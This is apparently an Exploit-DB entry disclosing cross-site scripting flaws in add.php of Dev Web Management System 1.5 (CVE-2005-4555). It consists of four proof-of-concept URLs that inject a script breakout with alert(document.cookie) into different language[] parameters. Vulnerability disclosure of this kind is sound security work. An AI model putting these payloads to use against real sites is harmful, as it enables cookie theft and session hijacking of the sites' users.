Dev Web Management System 1.5 add.php Multiple Parameter XSS

2005-12-27T00:00:00
ID EDB-ID:26978
Type exploitdb
Reporter retrogod@aliceposta.it
Modified 2005-12-27T00:00:00

Description

Dev Web Management System 1.5 add.php Multiple Parameter XSS. CVE-2005-4555. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/16063/info
   
Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks.
   
Dev Web Management System versions 1.5 and earlier are prone to these issues. 

http://example.com/[path]/add.php?language[ENTER_ARTICLE_TITLE]=");}}--></script><script>alert(document.cookie)</script>

http://example.com/[path]/add.php?language[SPECIFY_ZONE]=");}}--></script><script>alert(document.cookie)</script>

http://example.com/[path]/add.php?language[ENTER_ARTICLE_HEADER]=");}}--></script><script>alert(document.cookie)</script>

http://example.com/[path]/add.php?language[ENTER_ARTICLE_BODY]=");}}--></script><script>alert(document.cookie)</script>